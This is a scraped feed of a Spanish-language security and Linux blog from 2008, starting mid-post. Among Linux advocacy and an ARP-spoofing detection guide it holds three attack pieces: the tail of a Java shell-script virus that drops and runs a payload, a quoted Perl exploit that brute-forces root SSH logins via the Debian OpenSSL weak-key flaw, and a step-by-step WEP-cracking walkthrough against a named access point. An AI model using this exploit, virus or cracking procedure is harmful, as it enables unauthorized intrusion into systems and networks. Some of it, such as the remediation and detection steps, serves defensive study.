Runtime.getRuntime().exec("/usr/bin/chmod 777 " +<br /> userHome + "/.homer.sh");<br /> Process exec = Runtime.getRuntime().exec("/bin/sh " + userHome +<br /> "/.homer.sh");<br /> } catch (IOException ioe) {}<br /> }<br />}<br />zkk:~/Security#<br /><br />Este programa infecta los sistemas Unix con un virus que contamina ficheros shellscript; antes de hacerlo muestra el mensaje `Java is safe, and UNIX viruses do not exist', para después localizar todos los ficheros shell en el directorio $HOME, comprobar cuáles están infectados, e infectar los que no lo están.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2107186878144954506?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com3tag:blogger.com,1999:blog-11983284204523461.post-84185718202379633112008-05-21T14:31:00.002-05:002008-05-21T14:34:56.150-05:00Llegaron los discos de ubuntu =)<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_OdUSaKBFEPk/SDR5PDnrHwI/AAAAAAAAAJA/dg5RGiDOYWY/s1600-h/ubuntu"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_OdUSaKBFEPk/SDR5PDnrHwI/AAAAAAAAAJA/dg5RGiDOYWY/s320/ubuntu" border="0" alt=""id="BLOGGER_PHOTO_ID_5202916769096474370" /></a><br /><br />Hoy me han llegado los discos de GNU/LINUX ubuntu para 64 y 32 bits, yo no utilizo esta distribución pero muchas personas que conozco si, adames de que las regalo para las personas que se van iniciando en esto que es el mundo de GNU/LINUX. <br /><br />Todas las personas que quieran un disco solo hagan meló saber con gusto se las daré.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-8418571820237963311?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com1tag:blogger.com,1999:blog-11983284204523461.post-11364680219590113062008-05-20T18:28:00.001-05:002008-05-20T18:30:50.707-05:00Mas de 25 razones de peso para migrar a GNU/Linux1 - Debido a que está licenciado bajo licencia GPL, GNU/Linux (así como todo el software libre) está disponible sin ningún coste. Puede ser descargado de Internet de forma gratuita, y puede ser adquirido en formato CD o DVD con un coste muy trivial. Una copia puede ser utilizada en tantos ordenadores como queramos sin restricciones. Si comparamos con Microsoft Windows, solo el sistema operativo nos costará por lo menos 100 € por ordenador.<br /><br />2 - Debido a que es software libre, GNU/Linux también es gratuito en el sentido de que cualquiera está autorizado a modificar, incluso su código fuente, de cualquier forma deseada. Si las versiones modificadas no son re-distribuidas, los cambios pueden mantenerse en secreto. Esto también choca bastante con Microsoft Windows, ya que las modificaciones no están permitidas. El código fuente es la versión original de un programa tal y como lo haya escrito un programador usando un lenguaje de programación y antes de ser compilado de forma que sus instrucciones puedan ser entendidas directamente por un ordenador. Por lo tanto, es necesario tener el código fuente con el fin de poder realizar cambios en un determinado programa. Esta capacidad de experimentar con el código fuente, y hacerlo sin necesidad de dar a conocer las modificaciones a terceros ha sido muy importante para un gran numero de organizaciones.<br /><br />3 - GNU/Linux cuenta con un soporte de alta calidad disponible de forma gratuita a través de Internet, en grupos de noticias y foros. Algunas personas afirman que este soporte es al menos tan bueno como en el software privativo, que además funciona, evidentemente, pagando. GNU/Linux puede adquirirse si se desea de forma comercial. Existen empresas que basan su negocio del software libre en negocio de servicios. Dan soporte de instalación de aplicaciones, parches para hacer frente a nuevas amenazas de seguridad y parches para arreglar bugs descubiertos recientemente. En GNU/Linux estos 2 últimos son relativamente infrecuentes...<br /><br />4 - Hay muy pocas posibilidades de que el soporte técnico para algún sistema GNU/Linux se elimine porque el software haya quedado obsoleto o por cualquier otro motivo. Esto se debe a que el código fuente estará siempre disponible para cualquier persona que lo desee, incluidas aquellas personas que prestan dicho soporte de forma gratuita en Internet y también para aquellas empresas que basan su negocio en los servicios. Por el contrario Microsoft Windows, y otros programas privativos cuyo código fuente es mantenido en secreto, la obtención de soporte técnico se complica si la compañía que lo vende decide retirar el software con el fin de tratar de obligar al usuario a pagar por la nueva versión, por ejemplo.<br /><br />5 - No existe ningún temor a que las aplicaciones se queden obsoletas con GNU/Linux. Esto se debe a que la arquitectura UNIX en la que se basan ha sido exhaustivamente probada y refinada durante más de 35 años y ha demostrado ser extremadamente eficaz, robusta y segura. Las mejoras se realizan a un ritmo rápido, pero las nuevas versiones siguen siendo compatibles con la arquitectura UNIX subyacente.<br /><br />6 - No hay actualizaciones obligatorias para los usuarios de GNU/Linux. Esto se debe a que las versiones antiguas siguen siendo soportadas (por ejemplo, con el desarrollo de nuevos parches de seguridad y controladores de dispositivo) y porque las nuevas versiones, si así lo desean, están disponibles de forma gratuita y suelen ser compatibles con versiones anteriores. Los desarrolladores de software propietario, sin embargo, tienen fuertes incentivos financieros para planificar el que una determinada versión quede obsoleta. Su objetivo será inducir a los usuarios de versiones anteriores a gastar dinero para comprar o actualizar a las nuevas versiones.<br /><br />7 - En caso de que un usuario decida actualizar a una versión más reciente de GNU/Linux, no hay derechos de licencia de software u otros gastos si el usuario selecciona una distribución libre. Por otra parte, la formación, modificaciones, adquisición de hardware y otros costos relacionados con una actualización a una nueva versión son también relativamente bajos debido a la compatibilidad con versiones anteriores.<br /><br />8 - GNU/Linux no tiene complicados requisitos para hacer cumplir las licencias. En una empresa con cientos o miles de ordenadores, será necesario tener a un gran numero de personal solo para asegurarnos de que todos los ordenadores están cumpliendo con las complejas condiciones de autorización de uso (EULAs) para Microsoft Windows, Microsoft Office y otras aplicaciones propietarias. Con GNU/Linux no hay temor a auditorías sorpresa con posibles sanciones por violación de licencias.<br /><br />9 - GNU/Linux es mucho más seguro con una muy baja tasa de infección por virus, troyanos, gusanos, software espía y otros códigos maliciosos. Esto se debe a que UNIX y todos sus descendientes (incluyendo GNU/Linux) fueron diseñados desde un principio con la seguridad en mente, en lugar de tratar de parchear graves fallos de seguridad cuando ys es demasiado tarde. Por ejemplo, los usuarios no habitúan a usar el sistema con permisos de administración, a fin de proteger los principales archivos del sistema. Incluso en el caso que la existencia de un código malicioso, este no poseería permisos suficientes para hacer mucho daño. Además un sólido firewall se incluye en las principales distribuciones y es activado por defecto. Otro factor a tener en cuenta es la libre disponibilidad del código fuente, lo que permite a miles de personas de todo el mundo poder buscar vulnerabilidades de seguridad.<br /><br />10 - GNU/Linux es altamente resistente a los fallos de sistema y raramente necesita reiniciar. Esto puede ser muy importante para las grandes organizaciones para las que unos minutos de tiempo de inactividad puede suponer un coste sustancial. La razón es que GNU/Linux ha sido diseñado desde cero para ser un sistema operativo estable y robusto, incorporando todo lo aprendido en 35 años de historia de UNIX.<br /><br />11 - Aunque el número y la variedad de programas para GNU/Linux aún no es tan grande como para el sistema operativo de Microsoft, ya existe una extensa selección y aumenta continuamente y cada vez más rápido a medida que más y más desarrolladores empiezan a crear programas para GNU/Linux. La mayoría de programas para GNU/Linux también son software libre y muchos de ellos tienen las mismas características y rinden igual o mejor que las ya existentes para Microsoft Windows. De hecho, los usuarios se encuentran a menudo con que todas las aplicaciones que necesitan están disponibles gratuitamente en Internet y que ya no necesitan comprar ningún software comercial.<br /><br />12 - Existe una numerosa variedad de distribuciones GNU/Linux (varios cientos), cada una con su propio conjunto único de características, pero básicamente todas compatibles entre sí. Esto permite a los usuarios seleccionar las versiones que mejor respondan a sus necesidades específicas. También significa que si un distribuidor de GNU/Linux dejará de operar, todavía habría muchos otros para elegir. Por otra parte, fomenta una sana competencia entre ellas, contribuyendo así a la mejora continuada de la calidad y el rendimiento de GNU/Linux. La elección parece abrumadora pero por lo general es difícil cometer un error seleccionando una de las más populares, como Red Hat, Susu o Ubuntu.<br /><br />13 - GNU/Linux cuenta con un alto grado de flexibilidad de configuración. Se puede lograr una alta personalización muy fácilmente y sin tener que modificar el código fuente. Es muy sencillo configurar GNU/Linux durante la instalación y optimizarlo para su uso como estación de trabajo, ordenador de escritorio, ordenador portátil, servidor web, servidor de base de datos, etc. Del mismo modo el aspecto y el comportamiento del escritorio, incluyendo iconos y menús puede ser configurado con un numero casi infinito de posibilidades y formas. Incluso puede hacerse parecido a Windows... Si esto no fuera suficiente, la capacidad de libre acceso al código fuente permite un grado de personalización "ilimitado".<br /><br />14 - GNU/Linux utiliza formatos abiertos y estándares. Estos son aquellos que se ajustan a las normas de la industria y que pueden ser utilizados por cualquier desarrollador de software para crear programas compatibles. Es el caso de los formatos para el procesamiento de textos, hojas de calculo y otros tipos de archivos. En comparación con los formatos privativos (véase el formato DOC), el uso de estándares elimina el problema del apego a las normas privadas, con la consecuente dificultad y coste a la hora de cambiar a otro software en un futuro. El uso de formatos abiertos permite al usuario tener el control total de sus datos, en particular en el caso de que el vendedor de software decida dar por obsoleta la versión del programa, obligando al usuario a migrar todos sus datos a la nueva versión, previo pago, por supuesto...<br /><br />15 - GNU/Linux es generalmente más rápido para un determinado conjunto de especificaciones de hardware. Esto es debido a una mayor optimización del código fuente.<br /><br />16 - GNU/Linux cuenta con un alto grado de compatibilidad con otros sistemas operativos. Por ejemplo, se puede escribir, leer, copiar, borrar y manipular los datos existentes en una partición para Microsoft Windows, actuar como servidor para una red que contenga clientes en Windows, formatear discos duros para el uso con Windows, e incluso ejecutar los programas de Windows directamente si fuera necesario. En comparación, los sistemas operativos de Microsoft no pueden acceder a particiones de disco que contengan otros sistemas, no pueden formatear discos duros para otros sistemas, etc, etc...<br /><br />17 - La ética y la moral se mantienen muy altas en el mundo GNU/Linux y en el resto del software libre debido a la gran apertura de su proceso de desarrollo y a la libre disponibilidad del código fuente. GNU/Linux nunca ha sido condenado en un tribunal por violación de leyes antimonopolio u otros delitos, ni ha tenido que pagar sanciones por la copia no autorizada de tecnología desarrollada por otras empresas. Las políticas gubernamentales antimonopolio regulan o rompen monopolios con el fin de promover la libre competencia. Los beneficios por alcanzar dicha competencia afectan a la economía y a la sociedad en su conjunto.<br /><br />18 - GNU/Linux reduce la necesidad de actualizar o sustituir hardware cuando se actualiza a una nueva versión. Esto se debe a que su código fuente es muy eficiente y compacto, lo que permite que funcione en computadoras antiguas que no son adecuadas para las versiones más recientes de Microsft Windows.<br /><br />19 - GNU/Linux es capaz de operar en una amplia variedad de plataformas y no solo se limita a equipos con procesadores Intel o AMD. Funciona perfectamente en una vasta variedad de equipos que van desde los superordenadores a los robots industriales, equipos médicos, teléfonos móviles (puede ejecutarse incluso en un reloj de pulsera)<br /><br />20 - GNU/Linux es una mejor elección para su uso en las instituciones académicas por una serie de razones. Entre ellas se encuentra el hecho de que no hay secretos (en marcado contraste con el software privativo), con lo que los estudiantes tendrán la oportunidad de estudiar como funcionan realmente los ordenadores en lugar de simplemente aprender a usarlos. Muchos profesores están convencidos de que es mucho más importante aprender los fundamentos prácticos de la informática que aprender el uso de aplicaciones especificas (como Microsoft Word o Power Point). Una de las razones es que los fundamentos prácticos de la informática seguirán siendo validos después de muchos años, mientras que las aplicaciones (especialmente las propietarias) están en constante cambio y los conocimientos adquiridos quedarán obsoletos en pocos tiempo.<br /><br />21 - Para los organismos gubernamentales, GNU/Linux permite la transparencia de los datos, ya que los almacena en formatos compatibles con toda la industria. Todo lo contrario al software comercial. Esta transparencia es importante para mantener una democracia efectiva. Esto permite a cualquier usuario acceder a los datos sin tener que comprar caros programas privativos. Por otra parte, mantenerlos en formatos estándar es mucho más seguro que hacerlo usando formatos propietarios.<br /><br />22 - En GNU/Linux hay muy pocas razones para temer la existencia de puertas traseras, en parte porque todo el código fuente está disponible para su inspección. Una puerta trasera es un método secreto para obtener acceso remoto a un ordenador. Existe una (muy justificada) preocupación por parte de los gobiernos y las corporaciones de que dichas puertas traseras se han insertado de forma encubierta en el software propietario, permitiendo a los desarrolladores y a otros gobiernos a acceder a sus datos confidenciales.<br /><br />23 - El uso y la promoción de GNU/Linux ayuda a fomentar una sana diversidad y aumento de competencia en toda la industria del software. Esa competencia puede promover el avance tecnológico, mejorar el rendimiento y disminuir los costes del software libre y del software propietario por igual. Tanto la teoría económica como los cientos de años de real experiencia en el mundo demuestran claramente que los monopolios no necesitan innovar, tienden a producir productos de mala calidad, inflan los precios y tienden a corromper el sistema político.<br /><br />24 - GNU/Linux y el software libre no solo han alcanzado, o en algunos casos superado al software privativo, sino que también desarrollan más rápido. Esta tendencia irá a más, dado que la demanda para este tipo de software sigue creciendo y cada vez más personas y organizaciones participan activamente en su desarrollo.<br /><br />25 - GNU/Linux ofrece la oportunidad de que los usuarios puedan contribuir al avance de la tecnología del software, debido a que el código fuente está disponible gratuitamente para ser estudiado, mejorado, ampliado y redistribuido. Un notable ejemplo de ello a nivel empresa ha sido IBM.<br /><br />26 - Existen en realidad más de 25 razones por las que organizaciones de todo el mundo están migrando a GNU/Linux. Un vigésimo sexto motivo es que con GNU/Linux no hay necesidad de desfragmentar los discos duros a diferencia de Windows. La fragmentación, que es la difusión de datos en lugares no contiguos puede reducir la eficacia del almacenamiento de datos y ralentizar el funcionamiento de la máquina. Desfragmentar no es difícil, pero puede ser una molestia tener que hacerlo periódicamente, y no es necesario si tienes un sistema operativo bien diseñado.<br /><br />He aqui las fuentes originales.<br /><br /><a href="http://www.bellevuelinux.org/reasons_to_convert.html">EN INGLES</a> <br /><br /><a href="http://historiasdequeso.blogspot.com/2008/05/25-razones-de-peso-para-migrar-gnulinux.html">EN ESPAÑOL</a>.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-1136468021959011306?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com1tag:blogger.com,1999:blog-11983284204523461.post-24535168182536108802008-05-17T13:09:00.002-05:002008-05-17T13:47:09.131-05:00Detectando ARP SpoofingEstas son dos de las formas mas fáciles que e encontrado para detectar el arp spoofing, son utilizando las herramientas de arpwatch y arpalert. Las puedes instalar en Debian desde synaptic o bien.<br /><br />#apt-get install arpwatch <br />#apt-get install arpalert<br /><br />ambos mandan alertas a /etc/log/syslog puedes hacerte un script para mandar las salidas a a otro archivo y también editar sus .conf en /etc/arpalert y /etc/arpwatch.conf . Puedes ver los manuales oficiales de ellos.<br /><br />#man arpalert<br />#man arpwatch<br /><br />Aquí esta la salida de syslog para ambos archivos arp mandándoles la orden que lean la interfaz eth2<br /><br />#arpalert -i eth2 {cambias la interfaz por la que te interese que este ala escucha}<br />#arpalert -i eth2 <br /><br />#cat /var/log/syslog | grep arp<br /><br />May 17 13:12:40 zk kernel: Measured 4131621884 cycles TSC warp between CPUs, turning off TSC clock.<br />May 17 13:43:59 zk arpalert: Auto selected device: eth1<br />May 17 13:43:59 zk arpwatch: bad interface eth1: eth1: no IPv4 address assigned - assuming unconfigured interface<br />May 17 13:43:59 zk arpwatch: Running as uid=115 gid=121<br />May 17 13:43:59 zk arpwatch: listening on eth1<br />May 17 13:43:59 zk arpwatch: exiting<br />May 17 13:44:16 zk arpalert: Auto selected device: eth1<br />May 17 13:44:16 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)<br />May 17 13:44:34 zk arpwatch: bad interface eth1: eth1: no IPv4 address assigned - assuming unconfigured interface<br />May 17 13:44:34 zk arpwatch: listening on eth1<br />May 17 13:44:57 zk arpwatch: exiting<br />May 17 14:41:04 zk arpalert: Selected device: eth2<br />May 17 14:41:04 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)<br />May 17 14:41:42 zk arpwatch: listening on eth2<br />May 17 14:42:10 zk arpwatch: new station 192.168.0.11 0:38:de:34:46:g7 eth2<br />May 17 14:42:10 zk arpwatch: new station 192.168.0.1 0:44:54:84:F3:c5 eth2<br />May 17 14:43:13 zk arpwatch: bogon 1.15.54.18 0:44:4:34:14:c3 eth2<br />May 17 14:55:14 zk arpwatch: bogon 1.15.54.18 0:44:45:y4:d3:56 eth2<br />May 17 15:07:27 zk arpwatch: bogon 1.15.54.18 0:1e:45:y4:t3:56 eth2<br />May 17 15:10:15 zk arpwatch: bogon 1.15.54.18 0:64:43:8a:1y:t6 eth2<br />May 17 15:14:38 zk arpalert: Auto selected device: eth1<br />May 17 15:14:38 zk arpalert: daemon instance already running (file: /var/run/arpalert.pid locked)<br />May 17 15:25:16 zk arpwatch: bogon 1.15.54.18 0:44:74:w4:13:56 eth2<br />May 17 15:30:36 zk arpwatch: bogon 1.15.54.18 0:d4:48:e4:13:56 eth2<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2453516818253610880?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-83110817542997936412008-05-15T14:54:00.004-05:002008-05-15T15:10:44.280-05:00[SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generatorVulnerabilidad crítica en las claves OpenSSL de Debian y las basadas en debian tambien.<br /><br />Ubuntu Ubuntu Linux 8.04 LTS sparc<br />Ubuntu Ubuntu Linux 8.04 LTS powerpc<br />Ubuntu Ubuntu Linux 8.04 LTS lpia<br />Ubuntu Ubuntu Linux 8.04 LTS i386<br />Ubuntu Ubuntu Linux 8.04 LTS amd64<br />Ubuntu Ubuntu Linux 7.10 sparc<br />Ubuntu Ubuntu Linux 7.10 powerpc<br />Ubuntu Ubuntu Linux 7.10 lpia<br />Ubuntu Ubuntu Linux 7.10 i386<br />Ubuntu Ubuntu Linux 7.10 amd64<br />Ubuntu Ubuntu Linux 7.04 sparc<br />Ubuntu Ubuntu Linux 7.04 powerpc<br />Ubuntu Ubuntu Linux 7.04 i386<br />Ubuntu Ubuntu Linux 7.04 amd64<br />Debian Linux 4.0 sparc<br />Debian Linux 4.0 s/390<br />Debian Linux 4.0 powerpc<br />Debian Linux 4.0 mipsel<br />Debian Linux 4.0 mips<br />Debian Linux 4.0 m68k<br />Debian Linux 4.0 ia-64<br />Debian Linux 4.0 ia-32<br />Debian Linux 4.0 hppa<br />Debian Linux 4.0 arm<br />Debian Linux 4.0 amd64<br />Debian Linux 4.0 alpha<br />Debian Linux 4.0<br /><br /><a href="http://lists.debian.org/debian-security-announce/2008/msg00152.html">Anuncio en debian</a><br /><br /><a href="http://milw0rm.com/exploits/5622">en MilwOrm</a><br /><br /><br />the debian openssl issue leads that there are only 65.536 possible ssh <br />keys generated, cause the only entropy is the pid of the process <br />generating the key.<br /><br />This leads to that the following perl script can be used with the <br />precalculated ssh keys to brute force the ssh login. It works if such a <br />keys is installed on a non-patched debian or any other system manual <br />configured to.<br /><br />On an unpatched system, which doesn't need to be debian, do the following:<br /><br />keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/<br /><br />1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2<br /> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2<br /><br />2. Extract it to a directory<br /><br />3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 <br />Bits, generated on an upatched debian (this is the key this exploit will <br />break)<br /><br />4. Run the perl script and give it the location to where you extracted <br />the bzip2 mentioned.<br /><br />#!/usr/bin/perl<br />my $keysPerConnect = 6;<br />unless ($ARGV[1]) {<br /> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";<br /> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";<br /> print "By mm@deadbeef.de\n";<br /> exit 0;<br />}<br />chdir($ARGV[0]);<br />opendir(A, $ARGV[0]) || die("opendir");<br />while ($_ = readdir(A)) {<br /> chomp;<br /> next unless m,^\d+$,;<br /> push(@a, $_);<br /> if (scalar(@a) > $keysPerConnect) {<br /> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i <br />".$_ } @a)." ".$ARGV[1]);<br /> @a = ();<br /> }<br />}<br /><br />5. Enjoy the shell after some minutes (less than 20 minutes)<br /><br />Regards,<br />Markus Mueller<br />mm@deadbeef.de<br /><br /># milw0rm.com [2008-05-15]<br /><br /><br />Yo en mi sistema hice lo siguiente:<br /><br /># rm /etc/ssh/ssh_host_*<br /><br />Y después las he regenerado con:<br /><br /># dpkg-reconfigure -plow openssh-server<br /><br />Y todo perfecto.<br /><br />Esto lo leei en un post de <a href="http://www.esdebian.org/article.php/20080513140417785">haplo</a> en <a href="http://www.esdebian.org">esDebian</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-8311081754299793641?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-40785610005934175302008-05-06T23:23:00.004-05:002008-05-07T15:25:56.715-05:00Excelente video, esta para llorar.Excelente vídeo este vídeo tiene mas de medio año que lo avía visto y hoy no se porque me acorde del, y decidí ponerlo en el blog para que la gente lo pudiera apreciar también, espero les guste tanto como a mi.<br /><br /><object width="425" height="355"><param name="movie" value="http://www.youtube.com/v/YDRId6QmNTA&hl=es"></param><param name="wmode" value="transparent"></param><embed src="http://www.youtube.com/v/YDRId6QmNTA&hl=es" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed></object><br /><br />otro en link al mismo video.<br /><br /><object width="425" height="355"><param name="movie" value="http://www.youtube.com/v/DgzHrI61CuM&hl=es"></param><param name="wmode" value="transparent"></param><embed src="http://www.youtube.com/v/DgzHrI61CuM&hl=es" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed></object><br /><br /><a href="http://mx.youtube.com/watch?v=DgzHrI61CuM">VIDEO AQUI</a> y <a href="http://mx.youtube.com/watch?v=YDRId6QmNTA">AQUI</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-4078561000593417530?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com3tag:blogger.com,1999:blog-11983284204523461.post-61762934446774679282008-05-05T16:35:00.002-05:002008-05-05T16:39:43.103-05:00No mames .....<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_OdUSaKBFEPk/SB9-Vv3nnaI/AAAAAAAAAI4/fW914HY0SB8/s1600-h/Pantallazo.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_OdUSaKBFEPk/SB9-Vv3nnaI/AAAAAAAAAI4/fW914HY0SB8/s400/Pantallazo.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5197011407100943778" /></a><br /><br />HAAAAAA NO MAMES SIEMPREEEEE.............<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6176293444677467928?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com3tag:blogger.com,1999:blog-11983284204523461.post-64934712050120251912008-05-02T12:24:00.000-05:002008-05-02T12:30:58.461-05:00Como usar un ExploitHay diferentes tipos de exploits, se pueden clasificar en locales y remostos. Los Remotos actúan desde tu maquina hacia la maquina a explotar la vulnerabilidad, por lo general se explota una vulnerabilidad de algún servicio que se este ejecutando, de tal manera que también podemos hacernos de algún puerto no privilegiado.<br />Los exploits locales se ejecutan en la misma maquina de tal manera que si deseamos atacar otra maquina necesitamos primero tener algún tipo de shell en la otra maquina para así utilizar el exploit, si no es así puede ser que el exploit nos afecte, esto es en caso de tener los mismos problemas de seguridad que la maquina a atacar.<br /><br />Ahora bien para utilizar un exploit necesitamos primero entender el código del exploit ya que la mayoría de las veces vienen con algunos errores, para que no cualquiera los pueda ejecutar, ya sean algunas lineas comentadas o algún ciclo mal o ya sea valores de mas, offsets, etc, etc.<br />Depende mucho del exploit a ejecutar la mayoría están echos en C con lo que haríamos los siguiente.<br /><br />#gcc exploit.c -o nombre_exploit<br />#./exploit [parametros] ----> en caso de que los tenga<br /><br />Como lo mencione antes es útil leer el código para saber compilarlo y utilizarlo.<br /><br />Los que estan en shellscript hariamos lo siguiente. (script.sh)<br />#chmod a+x script.sh <br />#script.sh [parametros]<br /><br />Los que estan en perl hariamos los siguiente. (exploit.pl)<br />#perl exploit.pl [parametros]<br /><br />De esta forma utilizamos la mayoría de los exploits. Aunque un exploit no es necesariamente un programa sino mas bien una forma de explotar alguna vulnerabilidad. Hay tener cuidado con estos ya que utilizarlos fuera de las auditorías de res, osea con permiso de poder ejecutarlos, se toma como delito.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6493471205012025191?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com0tag:blogger.com,1999:blog-11983284204523461.post-62646780033084587662008-04-30T15:10:00.003-05:002008-04-30T15:14:43.960-05:00Crackear (Auditar) claves WEPPrimero que nada quiero aclarar que este pequeño documento les sirve a las personas que tienen las tarjetas ipw3945, ipw2915, ipw2200. Ya que yo tengo una de esas tarjetas y hace tiempo leei un documento que decía lo siguiente .<br /><br />############ <br />pw2915 uses ipw2200 driver (See this thread <br /> ipw3945 for alpha injection support.) For ipw3945 you <br /> can use the ipwraw-ng driver or see Live <br /> Distros for WifiWay which includes patches for <br /> injection. <br /> #############<br /><br />Ha si que por esa razón utilice ipwraw-ng para mi debían, pero me es mas sencillo utilizar el <a href="http://www.wifiway.org/">wifiway,</a><br />hasi que lo explicare utilizando <a href="http://www.wifiway.org/">wifiway,</a> ya que viene muy bien soportada mi tarjeta ipw3945.<br /><br />Lo primero es descargar la distro <a href="http://www.wifiway.org/">wifiway,</a> y echarla andar, una ves tengamos jalando lo primero que haremos sera ver que AP astan jalando.<br /><br />#airodump-ng rtap0<br /><br />De esta manera veremos que AP están funcionando mejor y en que canal están viajando (chanel), también veremos el BSSID del AP. Después de ver cual es AP que mas nos conviene o de ver cual es el que queremos chingar, tomamos nota del canal (chanel, ch) y del BSSID del módem.<br />Ahora bien lo primero que aremos sera cambiar la MAC.<br /><br />#macchanger -m [fakemac] [interface_wifi]<br />esto seria<br />#macchanger -m 00:22:33:11:44:66<br /><br />Después entramos a los archivos bssid y chanel que se encuentran en /sys/class/net/wifi0/device y los editamos.<br /><br />#nano chanel <br />Aquí ponemos el ch del AP a auditar, es decir el canal, por lo general son del 1 al 11, con los que mayormente me encontrado son el 1, 6 y el 11<br /><br />#nano bssid<br />En este archivo ponemos el BSSID del AP o módem a auditar.<br /><br />Despues de guardar ambos archivos, empezamos lo interesante. A CAPTURAR.<br /><br />#airodump-ng -c [chanel] -w [ruta_y_nombre_del_archivo_de_captura] rtap0<br />esto seria.<br />#airodump-ng -c 1 -w /home/usuario/captura rtap0<br /><br />Lo dejamos jalando y en el mismo directorio anterior editamos el archivo rate<br /><br />#nano rate<br />aquí le damos el rango de 2, por lo general viene 108 se lo cambiamos y guardamos.<br /><br />Este paso es si queremos, yo siempre lo hago, el cual es levantar la interfase.<br /><br />#ifconfig [interfaz] up<br />seria<br />#ifconfig wlan0 up ----> en mi caso recordemos que las interfaces varían.<br /><br />Ahora hay que asociar la tarjeta con el AP.<br /><br />#aireplay-ng -1 0 -a [BSSID] -h [FAKEMAC] -e [ESSID_AP] [INTERFAZ]<br />esto seria.<br />#aireplay -ng -1 0 -a 29:D9:72:4D:15:55 -h 00:22:33:11:44:66 -e INFINITUM445 wifi0<br /><br />#####este paso lo podemos repetir varias veces hasta asociarnos######<br /><br />Después de la asociación hacemos.<br /><br />#aireplay-ng -3 -b [BSSID] -h [FAKEMAC] [INTERFAZ]<br />esto seria.<br />#aireplay-ng -3 -b 29:D9:72:4D:15:55 -h 00:22:33:11:44:66 wifi0<br /><br />En este punto esperamos asta tener bastantes IVs o datos capturados, varia siempre hay veces que tumbas la clave con pocos datos capturados y hay veces que necesitas de amadre, ha si que podemos hacer el siguiente paso varias veces hasta que nos la encuentre.<br /><br />#aircrack-pwt ARCHIVO_DE_CAPTURA.cap<br />es decir<br />#aircrack-pwt /home/usuario/captura.cap<br />o bien<br />#cd /home/usuario<br />aircrack-pwt captura.cap<br /><br />Si todo sale bien solamente hay que esperar a que aircrack decifre la clave y listo. Nos podemos conectar ha si.<br /><br />#iwconfig [interfaz] essid [nombre_del_ap] mode managed key [CLAVE_WEP] && dhclient [interfaz]<br />esto seria.<br /><br />#iwconfig wifi0 essid INFINITUM445 mode managed key 1029384756 && dhclient wifi0<br /><br />Nota: Hay que revisar el RXQ para la captura sino tendremos que acercarnos mas al AP.<br />Nota2: Si no encuentras el archivo donde editas el BSSID, el CHANEL y el RATE puedes hacer un “find” para saber donde están.<br /><br />#find / -name bssid<br />#find / -name chanel<br />#find / -name rate<br /><br />Deberán estar en la misma carpeta. =)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6264678003308458766?l=zerialkiller.blogspot.com'/></div>zerial killerhttp://www.blogger.com/profile/14344870841054401136noreply@blogger.com1tag:blogger.com,1999:blog-11983284204523461.post-49047345573588837702008-04-25T16:56:00.003-05:002008-04-25T17:06:27.814-05:00FLISOL 2008<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.riveonline.com/data/phoo/2008_03_18/logo_flisol2008.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px;" src="http://www.riveonline.com/data/phoo/2008_03_18/logo_flisol2008.png" border="0" alt="" /></a><br /><br />¿Qué es el FLISOL?<br /><br />El FLISOL (Festival Latinoamericano de Instalación de Software Libre) es el evento de difusión de Software Libre más grande en Latinoamérica. Se realiza desde el año 2005 y su principal objetivo es promover el uso del software libre, dando a conocer al público en general su filosofía, alcances, avances y desarrollo.<br /><br />Para tal fin, las diversas comunidades locales de software libre (en cada país, en cada ciudad/localidad), organizan 